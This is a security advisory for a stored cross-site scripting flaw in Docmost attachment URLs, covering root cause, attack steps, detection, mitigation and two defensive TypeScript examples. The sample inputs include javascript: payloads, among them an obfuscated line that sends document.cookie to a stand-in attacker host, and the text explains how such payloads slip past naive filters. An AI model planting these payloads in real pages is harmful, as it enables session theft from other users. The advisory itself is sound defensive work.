CVE-2026-34212 Overview
CVE-2026-34212 is a stored Cross-Site Scripting (XSS) vulnerability in Docmost, an open-source collaborative wiki and documentation software. The vulnerability exists due to improper neutralization of attachment URLs, allowing a low-privileged authenticated user to store a malicious javascript: URL inside an attachment node in page content. When another user views the page and activates the attachment link or icon, attacker-controlled JavaScript executes in the context of the Docmost origin.
Critical Impact
Any authenticated user who can edit a page can plant JavaScript that runs in the browser of every other user who activates the attachment link, including administrators. Code running in the Docmost origin can issue authenticated API requests as the victim, read the DOM and local storage, and exfiltrate any cookie not flagged HttpOnly. Realistic outcomes are actions performed on the victim's behalf, content tampering, credential phishing from a trusted page and, where the session cookie is readable by script, session hijacking.
Affected Products
- Docmost versions prior to 0.71.0
Discovery Timeline
- 2026-04-14 - CVE-2026-34212 published to NVD
- 2026-04-14 - Last updated in NVD database
Technical Details for CVE-2026-34212
Vulnerability Analysis
This vulnerability is classified as CWE-79: Improper Neutralization of Input During Web Page Generation (Cross-Site Scripting). The flaw stems from insufficient validation and sanitization of user-supplied URLs within attachment nodes in Docmost's page content system. When a low-privileged authenticated user creates or edits page content, they can embed attachment references with arbitrary URL schemes, including the javascript: protocol.
The attack requires user interaction: a victim must click the malicious attachment link or icon, because a javascript: href runs on navigation, not when the page is rendered. Once triggered, the injected code runs with the full privileges of the Docmost origin in the victim's browser: it can call the Docmost API with the victim's session, read the DOM and local storage, and read any cookie that is not flagged HttpOnly.
Root Cause
The root cause is missing URL scheme validation for attachment URLs. Docmost does not enforce an allowlist of safe protocols (http:, https:, and relative paths) when an attachment node is stored or rendered, so any scheme, including javascript:, is written into page content and later emitted as the href of the attachment link. The check also has to be applied to the value the browser will actually navigate: browsers lowercase the scheme and strip tabs and newlines before resolving a URL, so JavaScript:alert(1) and java<TAB>script:alert(1) are equivalent to javascript:alert(1), and a naive string comparison against the literal prefix "javascript:" is not enough.
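The following is an added example of the allowlist check described above, written for this page and not taken from Docmost's code base. It uses the WHATWG URL parser (available in browsers and Node.js) so that the scheme is evaluated after the same normalisation the browser applies, and it resolves relative paths against a placeholder base (docmost.invalid, an assumption used only for parsing) so that a bare path like /api/attachments/... is accepted without the placeholder host ever reaching the stored value.

```typescript
// Added example (not Docmost's code): allowlist-based validation of an
// attachment node's URL before it is stored or rendered as an href.
const ALLOWED_PROTOCOLS = new Set<string>(["http:", "https:"]);

// Placeholder base so that relative paths parse. The host is an assumption
// used only for parsing; it never appears in the sanitised output.
const RELATIVE_BASE = "https://docmost.invalid/";

// Parse the candidate the way a browser would resolve an href: leading and
// trailing spaces/control characters are stripped, tabs and newlines are
// removed anywhere, and the scheme is lowercased. As a result
// " JaVaScRiPt:alert(1)" and "java\tscript:alert(1)" both parse with the
// protocol "javascript:" and cannot slip past the allowlist.
function parseAttachmentUrl(raw: string): URL | null {
  try {
    return new URL(raw, RELATIVE_BASE);
  } catch {
    return null; // unparseable input is treated as unsafe
  }
}

// True only if the URL the browser would navigate uses an allowlisted scheme.
function isSafeAttachmentUrl(raw: string): boolean {
  const url = parseAttachmentUrl(raw);
  return url !== null && ALLOWED_PROTOCOLS.has(url.protocol);
}

// Returns the value to store for the attachment node, or null to reject.
// Absolute URLs are returned in canonical form; inputs that resolved against
// the placeholder base were relative and are stored relative again.
function sanitizeAttachmentUrl(raw: string): string | null {
  if (raw.trim() === "") return null;
  const url = parseAttachmentUrl(raw);
  if (url === null || !ALLOWED_PROTOCOLS.has(url.protocol)) return null;
  if (url.origin === new URL(RELATIVE_BASE).origin) {
    return url.pathname + url.search + url.hash;
  }
  return url.href;
}

// Constructed inputs for a quick run; not real Docmost page data.
const SAMPLE_INPUTS = [
  "/api/attachments/7b3f/report.pdf",
  "https://files.example.com/report.pdf?dl=1",
  "javascript:alert(document.cookie)",
  " JaVaScRiPt:alert(1)",
  "java\tscript:alert(1)",
  "data:text/html,<script>alert(1)</script>",
];

function demo(): Array<[string, string | null]> {
  return SAMPLE_INPUTS.map((input) => [input, sanitizeAttachmentUrl(input)]);
}

for (const [input, result] of demo()) {
  console.log(JSON.stringify(input), "->", result === null ? "REJECTED" : result);
}
```

Note that the allowlist deliberately excludes data: and blob: even though they are not script schemes in the strict sense; a data:text/html link opened in the same tab gives the attacker a page under their control, and an audit of other schemes should be a conscious decision rather than a default.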
Attack Vector
The attack is network-based and requires low privileges (any authenticated user can exploit it) combined with user interaction from the victim. An attacker would:
- Authenticate to the Docmost instance with any valid user account
- Create or edit a page and insert an attachment node
- Set the attachment URL to a javascript: URI containing malicious code
- Wait for another user (potentially with higher privileges) to view the page and click the attachment
The malicious JavaScript then executes in the victim's browser session, potentially allowing the attacker to steal session cookies, perform actions as the victim, or redirect users to phishing pages.
Detection Methods for CVE-2026-34212
Indicators of Compromise
- Page content containing attachment nodes with javascript: URL schemes
- Unexpected JavaScript execution when users interact with attachment links
- User reports of unusual behavior after clicking attachments in wiki pages
- Page history or database change records (where available) showing attachment URLs edited to contain javascript:, data: or other non-http schemes
Detection Strategies
- Deploy a Content Security Policy with a report-uri or report-to directive; under CSP a javascript: URL counts as inline script, so a script-src that omits 'unsafe-inline' both blocks the payload and generates a violation report when a victim clicks it
- Scan stored page content for attachment URLs whose scheme is anything other than http:, https: or a relative path, normalising case and stripping whitespace and control characters before matching so obfuscated variants are not missed
- Review page history for edits that introduce attachment nodes with non-standard URL schemes
- A web application firewall can flag the literal string javascript: in page-save requests, but it only sees the payload at write time and is easily bypassed by case changes, embedded tabs or newlines, or encoding; treat it as a secondary signal rather than a control
Monitoring Recommendations
- Enable verbose logging for page content modifications and attachment changes
- Set up alerts for CSP violation reports that may indicate XSS exploitation attempts
- Regularly audit stored page content for potentially malicious URL patterns
- Monitor for unusual session activity that could indicate session hijacking
How to Mitigate CVE-2026-34212
Immediate Actions Required
- Upgrade Docmost to version 0.71.0 or later immediately
- Audit existing page content for attachment nodes containing javascript: URLs
- Review user activity logs for signs of exploitation
- Consider temporarily restricting attachment creation privileges until patched
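The audit step above, and the content-scanning detection strategy in the previous section, can be done with a small walker over stored page documents. Docmost is built on the Tiptap editor, so page content is a ProseMirror-style JSON tree; the walker below is an added example written for this page, not Docmost's own tooling, and the node type name "attachment", the attribute names url/href/src and the sample page are all assumptions constructed for illustration. It checks every URL-bearing attribute on every node, not only attachments, so it also catches the same class of problem in link or image nodes.

```typescript
// Added example (not Docmost's code): walk a stored ProseMirror/Tiptap page
// document and report every node whose URL-bearing attribute does not use an
// allowlisted scheme. Node type and attribute names are assumptions.
type PMNode = {
  type: string;
  text?: string;
  attrs?: Record<string, unknown>;
  content?: PMNode[];
};

interface Finding {
  path: string;     // JSON path to the offending node
  nodeType: string;
  attr: string;
  value: string;
  scheme: string;   // scheme as the browser would resolve it
}

const SAFE_SCHEMES = new Set<string>(["http:", "https:"]);
const URL_ATTRS = ["url", "href", "src"]; // assumed attribute names
const PARSE_BASE = "https://docmost.invalid/"; // placeholder for relative paths

// Scheme after browser-style normalisation (case folding, tab/newline removal),
// so "java\tscript:" is reported as "javascript:". Unparseable input is
// reported as "invalid:" so it is surfaced rather than silently skipped.
function schemeOf(value: string): string {
  try {
    return new URL(value, PARSE_BASE).protocol;
  } catch {
    return "invalid:";
  }
}

function findUnsafeUrls(node: PMNode, path = "doc"): Finding[] {
  const findings: Finding[] = [];
  for (const attr of URL_ATTRS) {
    const value = node.attrs?.[attr];
    if (typeof value === "string" && value.trim() !== "") {
      const scheme = schemeOf(value);
      if (!SAFE_SCHEMES.has(scheme)) {
        findings.push({ path, nodeType: node.type, attr, value, scheme });
      }
    }
  }
  node.content?.forEach((child, i) => {
    findings.push(...findUnsafeUrls(child, `${path}.content[${i}]`));
  });
  return findings;
}

// Constructed sample page (not real Docmost data): one benign attachment, one
// benign image, and one attachment carrying a javascript: URL with an embedded
// tab, the form that defeats a naive grep for the literal "javascript:".
const samplePage: PMNode = {
  type: "doc",
  content: [
    { type: "paragraph", content: [{ type: "text", text: "Quarterly report" }] },
    { type: "attachment", attrs: { name: "report.pdf", url: "/api/attachments/7b3f/report.pdf" } },
    { type: "attachment", attrs: { name: "notes.txt", url: "java\tscript:fetch('https://attacker.example/?c='+document.cookie)" } },
    { type: "image", attrs: { src: "https://files.example.com/diagram.png" } },
  ],
};

function auditSamplePage(): Finding[] {
  return findUnsafeUrls(samplePage);
}

for (const f of auditSamplePage()) {
  console.log(`${f.path} <${f.nodeType}> ${f.attr}=${JSON.stringify(f.value)} scheme=${f.scheme}`);
}
```

Run this over every page's content column from a database export (or via whatever API exposes raw page JSON) and treat each finding as a page to clean and a user account to review; the reported path tells an operator exactly which node to remove without reading the whole document.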
Patch Information
Docmost version 0.71.0 addresses this vulnerability by implementing proper URL scheme validation for attachment nodes. Organizations should upgrade to this version or later as soon as possible. For more details, refer to the GitHub Security Advisory.
Workarounds
- Deploy a strict Content Security Policy whose script-src omits 'unsafe-inline' (a javascript: URL is treated as inline script and blocked); verify the application still works under the policy, because a policy that has to include 'unsafe-inline' does not stop this attack
- Filtering requests containing the string javascript: at a web application firewall catches only the naive form of the payload and is bypassed with case changes or embedded tabs and newlines; do not rely on it as the sole control
- Restrict page editing permissions to trusted users only until the patch is applied
- Manually review and sanitize existing page content for suspicious attachment URLs
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.